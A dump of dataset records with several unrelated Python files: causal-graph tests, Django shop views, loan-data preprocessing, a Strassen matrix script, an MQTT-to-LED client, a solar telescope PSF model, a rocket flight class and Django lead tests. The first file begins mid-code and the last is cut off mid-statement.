self.assert_identifiable(graph_2c, P(Y @ ~X))\n\n def test_figure_2d(self):\n \"\"\"Test Figure 2D.\"\"\"\n graph_2d = NxMixedGraph()\n graph_2d.add_directed_edge(\"X\", \"Y\")\n graph_2d.add_directed_edge(\"Z\", \"X\")\n graph_2d.add_directed_edge(\"Z\", \"Y\")\n graph_2d.add_undirected_edge(\"X\", \"Z\")\n self.assert_identifiable(graph_2d, P(Y @ ~X))\n\n def test_figure_2e(self):\n \"\"\"Test Figure 2E.\"\"\"\n graph_2e = NxMixedGraph()\n graph_2e.add_directed_edge(\"X\", \"Z\")\n graph_2e.add_directed_edge(\"Z\", \"Y\")\n graph_2e.add_undirected_edge(\"X\", \"Y\")\n self.assert_identifiable(graph_2e, P(Y @ ~X))\n\n def test_figure_2f(self):\n \"\"\"Test Figure 2f.\"\"\"\n graph_2f = NxMixedGraph()\n graph_2f.add_directed_edge(\"X\", \"Y\")\n graph_2f.add_directed_edge(\"X\", \"Z1\")\n graph_2f.add_directed_edge(\"Z1\", \"Y\")\n graph_2f.add_directed_edge(\"Z1\", \"Z2\")\n graph_2f.add_directed_edge(\"Z2\", \"Y\")\n graph_2f.add_undirected_edge(\"X\", \"Z2\")\n graph_2f.add_undirected_edge(\"Y\", \"Z1\")\n self.assert_identifiable(graph_2f, P(Y @ ~X))\n\n def test_figure_2g(self):\n \"\"\"Test Figure 2g.\"\"\"\n graph_2g = NxMixedGraph()\n graph_2g.add_directed_edge(\"Z2\", \"Z1\")\n graph_2g.add_directed_edge(\"Z2\", \"X\")\n graph_2g.add_directed_edge(\"Z2\", \"Z3\")\n graph_2g.add_directed_edge(\"X\", \"Z1\")\n graph_2g.add_directed_edge(\"Z1\", \"Y\")\n graph_2g.add_directed_edge(\"Z3\", \"Y\")\n graph_2g.add_undirected_edge(\"Z2\", \"X\")\n graph_2g.add_undirected_edge(\"Z2\", \"Y\")\n graph_2g.add_undirected_edge(\"X\", \"Z3\")\n graph_2g.add_undirected_edge(\"X\", \"Y\")\n self.assert_identifiable(graph_2g, P(Y @ ~X))\n","sub_path":"tests/test_is_identifiable.py","file_name":"test_is_identifiable.py","file_ext":"py","file_size_in_byte":7233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"149536103","text":"from django.shortcuts import render,reverse\nfrom django.contrib.auth.forms import UserCreationForm\nfrom zappyapp.models import Product,Customer,Cart\nfrom django.http import HttpResponseRedirect,HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom zappyapp.forms import CustomerUpdate\nfrom django.db.models import Q\n# Create your views here.\n\n\ndef home(request):\n products=Product.objects.all()\n return render(request,'zappyapp/home.html',{'products':products})\n\ndef rte(request):\n products=Product.objects.filter(cat_choice='rte')\n return render(request,'zappyapp/rte.html',{'products':products})\n\ndef rtc(request):\n products=Product.objects.filter(cat_choice='rtc')\n return render(request,'zappyapp/rtc.html',{'products':products})\n\n\ndef registration(request):\n sform=UserCreationForm(request.POST or None)\n if sform.is_valid():\n new_user=sform.save()\n return HttpResponseRedirect(reverse('zappyapp:home'))\n\n return render(request,'zappyapp/registration.html',{'sform':sform})\n\n@login_required\ndef profile(request):\n return render(request, 'zappyapp/profile.html')\n\n\n@login_required\ndef cprofile(request):\n if request.method == 'POST':\n cu_form = CustomerUpdate(request.POST,request.FILES,instance=request.user.customer)\n if cu_form.is_valid():\n cu_form.save()\n return HttpResponseRedirect(reverse('zappyapp:profile'))\n else:\n cu_form = CustomerUpdate(request.POST,request.FILES,instance=request.user.customer)\n return render(request, 'zappyapp/cprofile.html',{'cu_form':cu_form})\n\n\ndef productsdetails(request,id):\n products=Product.objects.get(id=id)\n\n dict={'products':products}\n return render(request,'zappyapp/productdetails.html',context=dict)\n\ndef search(request):\n query=request.GET.get('q',None)\n if query is not None:\n query2= Q(pname__iexact=query) | Q(description__icontains=query)\n products=Product.objects.filter(query2).distinct()\n\n return render(request,'zappyapp/home.html',{'products':products})\n else:\n return HttpResponseRedirect(reverse('zappyapp:home'))\n\n\ndef cart_home(request):\n cart_obj, new_obj=Cart.objects.new_or_get(request)\n products=cart_obj.products.all()\n total=0\n for x in products:\n total+=x.price\n return render(request,'zappyapp/cart.html')#,{'val':val}\n\ndef cart_update(request):\n id=request.POST.get('product_id')\n print(id)\n if id is not None:\n try:\n id=Product.objects.get(id=id)\n except Product.DoesNotExist:\n print('no product')\n return redirect(\"zappyapp:cart\")\n if id in cart_obj.products.all():\n cart_obj.products.remove(id)\n else:\n cart_obj.products.add(id)\n products=Product.objects.get(id=id)\n return render(request,'zappyapp/productdetails.html',{'products':products})\n","sub_path":"zappyproject/zappyapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"51108058","text":"import pandas as pd\n\n#Read in the data - loan prediction dataset\n#change labels to numbers. N = 0 and Y = 1\n\n#Drop Dependents/loan_amount_term, loan_id columns\n#Remove rows with missing data\n#Standardize/Normalize applicant/co-applicant income/loan amount column between 0 and 1\n#Change property (Rural - 0, Semiurban - 0.5, Urban - 1)\n\ndef pre_process_data(data, limit=None):\n print (\"Reading and processing data:\")\n #read in data\n data = pd.read_csv(data)\n\n #convert these columns to 0 or 1\n data.loc[data['Loan_Status'] == \"N\", 'Loan_Status'] = 0\n data.loc[data['Loan_Status'] == \"Y\", 'Loan_Status'] = 1\n\n data.loc[data['Gender'] == \"Male\", 'Gender'] = 0\n data.loc[data['Gender'] == \"Female\", 'Gender'] = 1\n\n data.loc[data['Married'] == \"No\", 'Married'] = 0\n data.loc[data['Married'] == \"Yes\", 'Married'] = 1\n\n data.loc[data['Education'] == \"Not Graduate\", 'Education'] = 0\n data.loc[data['Education'] == \"Graduate\", 'Education'] = 1\n\n data.loc[data['Self_Employed'] == \"No\", 'Self_Employed'] = 0\n data.loc[data['Self_Employed'] == \"Yes\", 'Self_Employed'] = 1\n\n #drop irrelevant columns for this project\n data = data.drop(columns = ['Dependents', 'Loan_Amount_Term', 'Loan_ID'])\n\n #converting property area data to between 0 and 1\n data.loc[data['Property_Area'] == \"Rural\", 'Property_Area'] = 0\n data.loc[data['Property_Area'] == \"Semiurban\", 'Property_Area'] = 0.5\n data.loc[data['Property_Area'] == \"Urban\", 'Property_Area'] = 1\n\n #removing rows with missing values\n data = data.dropna()\n #return data.isnull().values.any()\n\n #Tip: Which Method To Use (standardizing or normalizing?)\n #It is hard to know whether rescaling your data will improve the performance of your algorithms before you apply them. \n #If often can, but not always.\n #A good tip is to create rescaled copies of your dataset and \n #race them against each other using your test harness and a handful of algorithms you want to spot check. \n #This can quickly highlight the benefits (or lack there of) of rescaling your data with given models, \n #and which rescaling method may be worthy of further investigation.\n\n #To learn, normalize these columns (MinMax scaler) and standardize (mean and sd), then compare performance\n\n data['ApplicantIncome']=(data['ApplicantIncome']-data['ApplicantIncome'].min())/(data['ApplicantIncome'].max()-data['ApplicantIncome'].min())\n data['CoapplicantIncome']=(data['CoapplicantIncome']-data['CoapplicantIncome'].min())/(data['CoapplicantIncome'].max()-data['CoapplicantIncome'].min())\n data['LoanAmount']=(data['LoanAmount']-data['LoanAmount'].min())/(data['LoanAmount'].max()-data['LoanAmount'].min())\n\n return data\n\n#test function\ncheck_data = pre_process_data('loan_data.csv')\nprint (check_data)\n\n","sub_path":"KNearest_Neighbors/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"546850504","text":"#!/usr/bin/env python3\n\n\"\"\"\nAUTHOR: Cody Kankel\nPROG: Serial_matrix.py\nDESC: This Python 3 script is a serial version of parallel_matrix.py.\nMPI4py is still required for this serial version as the MPI time is \nstill being used to calculate the run time of Strassen algorithm.\nThis serial version needs to be ran with only 1 proc/rank, and it\nwill multiply two matricies together, both the same matrix as specified\non the cmd line while executing this script. Example:\n mpirun -np 1 serial_matrix.py csv/4096_4096.csv\n\"\"\"\n\n\nimport numpy, sys, csv, math\nfrom mpi4py import MPI\n\ndef main():\n \"\"\"Main will read and initialize 2 matrices, print them,\n generate the correct dot product of them, and send them off to the\n strassen function to be calulated there. It is up to the user of this\n program as of right now to verify the strassen method is working.\"\"\"\n \n if len(sys.argv) != 2:\n sys.exit(2)\n \n \n matrix_A = get_matrix(str(sys.argv[1]))\n matrix_B = get_matrix(str(sys.argv[1]))\n \n \n #print('Matrix A is:')\n #print(matrix_A )\n #print('Matrix B is:')\n #print(matrix_B)\n #print('-'.center(40,'-'))\n #print('The correct product of these matrices is:')\n #print(numpy.dot(matrix_A, matrix_B))\n \n if matrix_A.shape != matrix_B.shape:\n print('Error: Matrix A and Matrix B are not the same size Matrix.')\n sys.exit()\n \n a_subSize = int(get_dim(matrix_A)/2)\n b_subSize = int(get_dim(matrix_B)/2)\n if a_subSize != b_subSize:\n print(\"error\")\n sys.exit()\n startTime = MPI.Wtime()\n \n matrix_C = strassen(matrix_A, matrix_B, a_subSize)\n \n # Leaving MPI in the serial version solely for the use of the MPI time.\n runTime = MPI.Wtime() - startTime\n \n print(\"The time to calculate strassen function in parallel is:\\n\", runTime)\n\n sys.exit()\n\ndef get_matrix(fileName):\n \"\"\"Function to open a specified file and read the contents using numpy's loadtxt call.\n Function will return a numpy matrix (formatted). 'fileName' argument MUST be a string\"\"\"\n \n with open(fileName, 'r') as file_ob:\n reader = csv.reader(file_ob)\n temp_list = list(reader)\n temp_list = temp_list[0]\n temp_list = list(map(int, temp_list))\n matr_len = len(temp_list)\n new_shape = int(math.sqrt(matr_len))\n matrix = numpy.asarray(temp_list)\n matrix = matrix.reshape(new_shape, new_shape)\n return matrix\n \ndef strassen(A, B, subSize):\n \"\"\"Function to perform the strassen algorithm on 2 numpy matricies specified as\n A and B. The function will return the dot product of these two matricies\n as a numpy.array matrix.\"\"\"\n \n \n # Rank 0 is the master, so it will prepare everything to be parallelized\n a_11 = A[0:subSize, 0:subSize]\n a_12 = A[0:subSize, subSize:]\n a_21 = A[subSize:, 0:subSize]\n a_22 = A[subSize:, subSize:]\n \n b_11 = B[0:subSize, 0:subSize]\n b_12 = B[0:subSize, subSize:]\n b_21 = B[subSize:, 0:subSize]\n b_22 = B[subSize:, subSize:]\n \n \n m1 = (a_11 + a_22).dot((b_11 + b_22))\n m2 = ((a_21 + a_22).dot(b_11))\n m3 = a_11.dot(b_12 - b_22)\n m4 = a_22.dot(b_21 - b_11)\n m5 = (a_11 + a_12).dot(b_22)\n m6 = (a_21 - a_11).dot(b_11 + b_12)\n m7 = (a_12 - a_22).dot((b_21 + b_22))\n \n \n\n C11 = m1 + m4 - m5 + m7\n C12 = m3 + m5\n C21 = m2 + m4\n C22 = m1 -m2 + m3 + m6\n \n\n # making final matrix from each piece\n C = numpy.bmat([[C11, C12], [C21, C22]])\n return C\n\n\ndef get_dim(matrix):\n \"\"\"Function to get the dim of a matrix and return. Assumes the matricies are\n already square. Returns an integer for the dim of the matrix\"\"\"\n return int((str(matrix.shape).split(',')[0].replace('(','')))\n\n# Standard boilerplate to call the main() function.\nif __name__ == '__main__':\n main()\n","sub_path":"src/Python/serial_matrix.py","file_name":"serial_matrix.py","file_ext":"py","file_size_in_byte":3904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"452502092","text":"'''\nCreated on Dec 7, 2018\n \n@author: stannis\n'''\nimport os,sys\nsys.path.append('/home/pi/Desktop/zexin/iot-device/apps')\nimport paho.mqtt.client as mqttClient\nfrom labs.module03 import SenseHatLedActivator\nclass MQTTClient(): \n def on_connect(self, clientConn, data, flags, resultCode):\n print(\"Client connected to server. Result: \" + str(resultCode))\n clientConn.subscribe(\"myActuatorData\")\n \n def on_message(self,clientConn, data, msg):\n print(\"Received PUBLISH on topic {0}. Payload: {1}\".format(str(msg.topic), str(msg.payload)))\n senledActivator = SenseHatLedActivator.SenseHatLedActivator()\n print(msg.payload)\n senledActivator.setDisplayMessage(msg.payload)\n senledActivator.setEnableLedFlag(True)\n senledActivator.run()\n \n def go(self):\n self.mc = mqttClient.Client()\n self.mc.on_connect = self.on_connect\n self.mc.on_message = self.on_message\n \n self.mc.connect(\"test.mosquitto.org\", 1883, 60)\n self.mc.loop_forever()\n \n","sub_path":"iot-device/apps/labs/module03/MQTTClient.py","file_name":"MQTTClient.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"10779435","text":"\"\"\"\nCalculate the point spread function (PSF) for the AIA telescopes\n\"\"\"\nimport numpy as np\nimport astropy.units as u\ntry:\n import cupy\n from cupy import prof\n HAS_CUPY = True\n\nexcept ImportError:\n HAS_CUPY = False\n\n__all__ = ['psf', 'filter_mesh_parameters', '_psf']\n\n\ndef filter_mesh_parameters(use_preflightcore=False):\n \"\"\"\n Geometric parameters for meshes in AIA filters used to calculate the\n point spread function.\n\n Parameters\n ----------\n use_preflightcore : `bool`, optional\n If True, use the pre-flight values for the filter mesh parameters\n\n Returns\n -------\n meshinfo : `dict`\n Dictionary with filter mesh information for each channel. Each channel\n entry then contains another dictionary with the following keys\n describing filter mesh properties of that channel\n (see Table 2 of [1]_):\n\n * `angle_arm`: Angles of the four entrance filter arms\n * `error_angle_arm`: Error in angle of the four entrance filter arms\n * `spacing_e`: Distance between diffraction spikes from entrance filter\n * `spacing_fp`: Distance between diffraction spikes from focal plane\n filter\n * `mesh_pitch`: Pitch of the mesh\n * `mesh_width`: Width of the mesh\n * `width`: Width applied to the Gaussian such that *after*\n convolution we have the proper width\n (:math:`4/3` at :math:`1/e` of max)\n\n References\n ----------\n .. [1] `Grigis, P., Su, Y., Weber M., et al., 2012,\n AIA PSF Characterization and Deconvolution\n `_\n\n See Also\n --------\n psf : Calculate the composite point spread function\n \"\"\"\n # These parameters were calculated from the following images and\n # reference background images:\n # 94:\n # image: 'AIA20101016_191039_0094.fits'\n # reference: 'AIA20101016_190903_0094.fits'\n # 131:\n # image: 'AIA20101016_191035_0131.fits'\n # reference: 'AIA20101016_190911_0131.fits'\n # 171:\n # image: 'AIA20101016_191037_0171.fits'\n # reference: 'AIA20101016_190901_0171.fits'\n # 193:\n # image: 'AIA20101016_191056_0193.fits'\n # reference: 'AIA20101016_190844_0193.fits'\n # 211:\n # image: 'AIA20101016_191038_0211.fits'\n # reference: 'AIA20101016_190902_0211.fits'\n # 304:\n # image: 'AIA20101016_191021_0304.fits'\n # reference: 'AIA20101016_190845_0304.fits'\n # 335:\n # image: 'AIA20101016_191041_0335.fits'\n # reference: 'AIA20101016_190905_0335.fits'\n # TODO: put this in another file, either JSON or asdf\n return {\n 94 * u.angstrom: {\n 'angle_arm': [49.81, 40.16, -40.28, -49.92] * u.deg,\n 'error_angle_arm': [0.02, 0.02, 0.02, 0.02] * u.deg,\n 'spacing_e': 8.99 * u.pixel,\n 'mesh_pitch': 363.0 * u.um,\n 'mesh_width': 34.0 * u.um,\n 'spacing_fp': 0.207 * u.pixel,\n 'width': (0.951 if use_preflightcore else 4.5) * u.pixel,\n 'CDELT': [0.600109, 0.600109]*u.arcsec,\n },\n 131 * u.angstrom: {\n 'angle_arm': [50.27, 40.17, -39.70, -49.95] * u.deg,\n 'error_angle_arm': [0.02, 0.02, 0.02, 0.02] * u.deg,\n 'spacing_e': 12.37 * u.pixel,\n 'mesh_pitch': 363.0 * u.um,\n 'mesh_width': 34.0 * u.um,\n 'spacing_fp': 0.289 * u.pixel,\n 'width': (1.033 if use_preflightcore else 4.5) * u.pixel,\n 'CDELT': [0.600698, 0.600698]*u.arcsec,\n },\n 171 * u.angstrom: {\n 'angle_arm': [49.81, 39.57, -40.13, -50.38] * u.deg,\n 'error_angle_arm': [0.02, 0.02, 0.02, 0.02] * u.deg,\n 'spacing_e': 16.26 * u.pixel,\n 'mesh_pitch': 363.0 * u.um,\n 'mesh_width': 34.0 * u.um,\n 'spacing_fp': 0.377 * u.pixel,\n 'width': (0.962 if use_preflightcore else 4.5) * u.pixel,\n 'CDELT': [0.599489, 0.599489]*u.arcsec,\n },\n 193 * u.angstrom: {\n 'angle_arm': [49.82, 39.57, -40.12, -50.37] * u.deg,\n 'error_angle_arm': [0.02, 0.02, 0.03, 0.04] * u.deg,\n 'spacing_e': 18.39 * u.pixel,\n 'mesh_pitch': 363.0 * u.um,\n 'mesh_width': 34.0 * u.um,\n 'spacing_fp': 0.425 * u.pixel,\n 'width': (1.512 if use_preflightcore else 4.5) * u.pixel,\n 'CDELT': [0.600758, 0.600758]*u.arcsec,\n },\n 211 * u.angstrom: {\n 'angle_arm': [49.78, 40.08, -40.34, -49.95] * u.deg,\n 'error_angle_arm': [0.02, 0.02, 0.02, 0.02] * u.deg,\n 'spacing_e': 19.97 * u.pixel,\n 'mesh_pitch': 363.0 * u.um,\n 'mesh_width': 34.0 * u.um,\n 'spacing_fp': 0.465 * u.pixel,\n 'width': (1.199 if use_preflightcore else 4.5) * u.pixel,\n 'CDELT': [0.600758, 0.600758]*u.arcsec,\n },\n 304 * u.angstrom: {\n 'angle_arm': [49.76, 40.18, -40.14, -49.90] * u.degree,\n 'error_angle_arm': [0.02, 0.02, 0.02, 0.02] * u.deg,\n 'spacing_e': 28.87 * u.pixel,\n 'mesh_pitch': 363.0 * u.um,\n 'mesh_width': 34.0 * u.um,\n 'spacing_fp': 0.670 * u.pixel,\n 'width': (1.247 if use_preflightcore else 4.5) * u.pixel,\n 'CDELT': [0.600165, 0.600165]*u.arcsec,\n },\n 335 * u.angstrom: {\n 'angle_arm': [50.40, 39.80, -39.64, -50.25] * u.degree,\n 'error_angle_arm': [0.02, 0.02, 0.02, 0.02] * u.deg,\n 'spacing_e': 31.83 * u.pixel,\n 'mesh_pitch': 363.0 * u.um,\n 'mesh_width': 34.0 * u.um,\n 'spacing_fp': 0.738 * u.pixel,\n 'width': (0.962 if use_preflightcore else 4.5) * u.pixel,\n 'CDELT': [0.600737, 0.600737]*u.arcsec,\n },\n }\n\n\n@u.quantity_input\ndef psf(channel: u.angstrom, use_preflightcore=False, diffraction_orders=None):\n \"\"\"\n Calculate the composite PSF for a given channel, including diffraction and\n core effects.\n\n .. note:: This function has been adapted from\n `aia_calc_psf.pro `_.\n\n .. note:: If the `cupy` package is installed\n and your machine has an NVIDIA GPU, the PSF calculation will\n automatically be accelerated with CUDA. This can lead to\n several orders of magnitude in performance increase compared to\n pure `numpy` on a CPU.\n\n The point spread function (PSF) can be modeled as a 2D Gaussian function\n of the radial distance :math:`r` from the center,\n\n .. math::\n\n I(r, \\\\theta) = I_0 \\exp\\left(\\\\frac{-r^2}{2\\sigma^2}\\\\right)\n\n where,\n\n - :math:`I_0` : the intensity of a diffraction spike\n - :math:`r` : the radial distance from the center\n - :math:`\\\\theta = m\\lambda/d`\n - :math:`m` : diffraction order\n - :math:`\\lambda` : the wavelength of light\n - :math:`\\sigma` : width of Gaussian\n\n The intensity of a particular diffraction spike, :math:`I_0`, is given by,\n\n .. math::\n\n I_0 = \\mathrm{sinc}^2\\left(\\\\frac{\\\\theta w}{\\lambda}\\\\right)\n\n where,\n\n - :math:`w` : the width of the mesh wires\n - :math:`d` : spacing between two consecutive mesh wires\n\n The PSF for a given filter can then be calculated as,\n\n .. math::\n\n \\mathrm{PSF} = \\sum_{m=-\\infty}^{+\\infty}I_m(r,\\\\theta)\n\n where, in practice, one can approximate the summation by simply summing\n over a sufficiently large number of diffraction orders. In this case, we\n sum from :math:`m=--100` to :math:`m=100`.\n\n Finally, the composite PSF of the entrance and focal plane filters is\n given by,\n\n .. math::\n\n \\mathrm{PSF}_c = \\left|\\mathcal{F}\\left\\{\n \\mathcal{F}\\{\\mathrm{PSF}_f\\}\n \\mathcal{F}\\{\\mathrm{PSF}_e\\}\n \\\\right\\}\\\\right|\n\n where :math:`\\mathcal{F}` denotes the Fourier transform,\n :math:`\\mathrm{PSF}_f` is the PSF of the focal plane filter, and\n :math:`\\mathrm{PSF}_e` is the PSF of the entrance filter. For a more\n detailed explanation of the PSF and the above calculation, see [1]_.\n\n Parameters\n ----------\n channel : `~astropy.units.Quantity`\n Wavelength of channel\n use_preflightcore : `bool`, optional\n If True, use the pre-flight values of the mesh width\n diffraction_orders : array-like, optional\n The diffraction orders to sum over. If None, the full\n range from -100 to +100 in steps of 1 will be used.\n\n Returns\n -------\n `~numpy.ndarray`\n The composite PSF of the entrance and focal plane filters.\n\n See Also\n --------\n filter_mesh_parameters\n deconvolve\n\n References\n ----------\n .. [1] `Grigis, P., Su, Y., Weber M., et al., 2012,\n AIA PSF Characterization and Deconvolution\n `_\n \"\"\"\n meshinfo = filter_mesh_parameters(use_preflightcore=use_preflightcore)\n meshinfo = meshinfo[channel]\n\n angles_entrance = meshinfo['angle_arm']\n angles_focal_plane = u.Quantity([45.0, -45.0], 'deg')\n\n if diffraction_orders is None:\n diffraction_orders = np.arange(-100, 101, 1)\n\n psf_entrance = _psf(meshinfo, angles_entrance, diffraction_orders)\n psf_focal_plane = _psf(meshinfo, angles_focal_plane, diffraction_orders,\n focal_plane=True)\n\n # Composite PSF\n psf = abs(np.fft.fft2(np.fft.fft2(psf_focal_plane)\n * np.fft.fft2(psf_entrance)))\n\n # Center PSF in the middle of the image\n psf = np.roll(np.roll(psf, psf.shape[1]//2, axis=1),\n psf.shape[0]//2,\n axis=0)\n # Normalize by total number of pixels\n psf = psf/(psf.shape[0]*psf.shape[1])\n # If using cupy, cast back to a normal numpy array\n if HAS_CUPY:\n psf = cupy.asnumpy(psf)\n\n return psf\n\n\n# from cupy import prof\n\ndef _psf(meshinfo, angles, diffraction_orders, focal_plane=False):\n with prof.time_range('setup',0): \n psf = np.zeros((4096, 4096), dtype=float)\n # If cupy is available, cast to a cupy array\n if HAS_CUPY:\n psf = cupy.array(psf) # asarray, or create on device rather than copy\n Nx, Ny = psf.shape\n width_x = meshinfo['width'].value\n width_y = meshinfo['width'].value\n # x and y position grids\n x = np.outer(np.ones(Ny), np.arange(Nx) + 0.5)\n y = np.outer(np.arange(Ny) + 0.5, np.ones(Nx))\n if HAS_CUPY:\n x = cupy.array(x) # same as above, either asarray or create on device rather than copy\n y = cupy.array(y)\n\n with prof.time_range('stuff',1):\n area_not_mesh = 0.82 # fractional area not covered by the mesh\n spacing = meshinfo['spacing_fp'] if focal_plane else meshinfo['spacing_e']\n mesh_ratio = (meshinfo['mesh_pitch'] / meshinfo['mesh_width']).decompose().value\n spacing_x = spacing * np.cos(angles)\n spacing_y = spacing * np.sin(angles)\n\n with prof.time_range('for_1',2):\n for order in diffraction_orders:\n with prof.time_range('order',3): \n if order == 0:\n continue\n intensity = np.sinc(order / mesh_ratio)**2 # I_0\n for dx, dy in zip(spacing_x.value, spacing_y.value):\n with prof.time_range('dx_dy',4): \n x_centered = x - (0.5*Nx + dx*order + 0.5)\n y_centered = y - (0.5*Ny + dy*order + 0.5)\n # NOTE: this step is the bottleneck and is VERY slow on a CPU\n psf += np.exp(-width_x*x_centered*x_centered\n - width_y*y_centered*y_centered)*intensity\n\n # Contribution from core\n with prof.time_range('psf_core',5): \n psf_core = np.exp(-width_x*(x - 0.5*Nx - 0.5)**2\n - width_y*(y - 0.5*Ny - 0.5)**2)\n with prof.time_range('psf_total',6): \n psf_total = ((1 - area_not_mesh) * psf / psf.sum()\n + area_not_mesh * psf_core / psf_core.sum())\n\n return psf_total\n","sub_path":"code/Schuck/psf_profiles_marker.py","file_name":"psf_profiles_marker.py","file_ext":"py","file_size_in_byte":12410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"288836830","text":"from config import Config\n\nclass Flight:\n __flightData = {}\n\n def __init__(self):\n self.__flightData = {\n \"Temperature\" : 0,\n \"Wind Speed\" : 0,\n \"Humidity\" : 0,\n \"Payload Name\" : \"\",\n \"Booster Name\" : \"\",\n \"Motor Name\" : \"\",\n \"Parachute Name\" : \"\",\n \"Motor Delay\" : 0,\n \"Payload\" : 0,\n \"Booster\" : 0,\n \"Eggs\" : [],\n \"Parachute\" : 0,\n \"Nomex\" : 0,\n \"Insulation\" : 0,\n \"Ballast\" : 0,\n \"Casing\" : 0,\n \"Motor\" : 0,\n \"Time\" : 0,\n \"Altitude\" : 0,\n \"Modifications\" : [],\n \"Damages\" : [],\n \"Characteristics\" : [],\n \"Considerations\" : []\n }\n\n # for \"Eggs\" field, input the list directly\n def set(self, field, value):\n if field in self.__flightData and not (field in Config._OBSERVATIONS):\n if type(self.__flightData[field]) is type(value):\n self.__flightData[field] = value\n else:\n raise ValueError(Config._EXCEPTION_1)\n else:\n raise ValueError(Config._EXCEPTION_0)\n\n # for \"Eggs\" field, returns the list directly\n def get(self, field):\n if field in self.__flightData and not (field in Config._OBSERVATIONS):\n return self.__flightData[field]\n else:\n raise ValueError(Config._EXCEPTION_0)\n\n def score(self):\n score = 0\n time = self.__flightData[\"Time\"]\n altitude = self.__flightData[\"Altitude\"]\n if time < Config._MIN_TIME:\n score += 4 * (Config._MIN_TIME - time)\n elif time > Config._MAX_TIME:\n score += 4 * (time - Config._MAX_TIME)\n return (score + abs(altitude - Config._ALTITUDE))\n\n def totalMass(self):\n total = 0\n for mass in Config._MASS_COMPONENTS:\n if mass == \"Eggs\":\n for eggMass in self.__flightData[mass]:\n total += eggMass\n else:\n total += self.__flightData[mass]\n\n return total\n\n def addObservation(self, field, message):\n if field in Config._OBSERVATIONS:\n if type(message) is types.StringTypes:\n self.__flightData[field].append(message)\n else:\n raise ValueError(Config._EXCEPTION_1)\n else:\n raise ValueError(Config._EXCEPTION_0)\n\n def removeObservation(self, field, i):\n if field in Config._OBSERVATIONS:\n if i in range(0, len(self.__flightData[field])):\n return self.__flightData[field].pop(i)\n else:\n raise IndexError(Config._EXCEPTION_2)\n else:\n raise ValueError(Config._EXCEPTION_0)\n\n def getObservation(self, field, i):\n if field in Config._OBSERVATIONS:\n if i in range(0, len(self.__flightData[field])):\n return self.__flightData[field][i]\n else:\n raise IndexError(Config._EXCEPTION_2)\n else:\n raise ValueError(Config._EXCEPTION_0)\n\n def observationSize(self, field):\n if field in Config._OBSERVATIONS:\n return len(self.__flightData[field])\n else:\n raise ValueError(Config._EXCEPTION_0)\n\n def isComplete(self):\n for i in Config._WEATHER:\n if self.__flightData[i] <= 0:\n return False\n for i in Config._SPECIFICATIONS:\n if self.flightData[i].strip() == \"\":\n return False\n for i in Config._MASS_COMPONENTS:\n if i == \"Eggs\":\n if len(self.__flightData[i]) < 1:\n return False\n else:\n for j in self.__flightData[i]:\n if j <= 0:\n return False\n elif self.flightData[i] <= 0:\n return False\n for i in Config._RESULTS:\n if self.__flightData[i] <= 0:\n return False\n for i in Config._OBSERVATIONS:\n if len(self.__flightData[i]) < 1:\n return False\n return True\n","sub_path":"src/flight.py","file_name":"flight.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"510314837","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n# Generated file, DO NOT EDIT\n# Changes may cause incorrect behavior and will be lost if the code is regenerated.\n# --------------------------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass ChangedIdentitiesContext(Model):\n \"\"\"ChangedIdentitiesContext.\n\n :param group_sequence_id: Last Group SequenceId\n :type group_sequence_id: int\n :param identity_sequence_id: Last Identity SequenceId\n :type identity_sequence_id: int\n \"\"\"\n\n _attribute_map = {\n 'group_sequence_id': {'key': 'groupSequenceId', 'type': 'int'},\n 'identity_sequence_id': {'key': 'identitySequenceId', 'type': 'int'}\n }\n\n def __init__(self, group_sequence_id=None, identity_sequence_id=None):\n super(ChangedIdentitiesContext, self).__init__()\n self.group_sequence_id = group_sequence_id\n self.identity_sequence_id = identity_sequence_id\n","sub_path":"vsts/vsts/identity/v4_1/models/changed_identities_context.py","file_name":"changed_identities_context.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"624444411","text":"from django.test import TestCase, Client\r\nfrom order.models import DomesticOrder\r\nfrom collegeaccess.models import Client_Lead\r\nfrom django.http import HttpResponseRedirect\r\nfrom userapp.forms import LeadForm\r\nfrom core.models import CourseCategory\r\nimport datetime\r\n\r\nclass DirectLeadTestCase ( TestCase ):\r\n\r\n fixtures = [ \"domesticorder.json\",\"country.json\", \"region.json\", \"state.json\", \"core_data.json\" ,\"content.json\",]\r\n \r\n def setUp(self):\r\n self.data_dict={ 'fname': 'test','email':'test@a.com','contact_number':'9898989898','current_location':'1','area_of_interest':[7],'sub_category':[37],'highest_qa_level':'Studying 10th','year_of_entrance':'2011','checkbox':'1' }\r\n self.institute_id=15267\r\n self.category=7\r\n \r\n def test_direct_orders( self ):\r\n \r\n order=DomesticOrder.objects.get(complementary=1,institute=15267)\r\n self.failUnless(isinstance(order, DomesticOrder))\r\n \r\n def test_direct_form(self):\r\n \r\n l_form = LeadForm( self.data_dict )\r\n self.assertTrue(l_form.is_valid())\r\n self.failUnless(isinstance(l_form, LeadForm))\r\n \r\n def test_direct_lead_submition_test( self ):\r\n \r\n order=DomesticOrder.objects.get(complementary=1,institute=self.institute_id)\r\n self.failUnless(isinstance(order, DomesticOrder))\r\n count=len([lead.leadsent for lead in Client_Lead.objects.filter(client=order,leadsent__email=self.data_dict['email'],leadsent__contact_number=self.data_dict['contact_number'],send_date__gt=datetime.date.today()-datetime.timedelta(days=180))])\r\n if count == 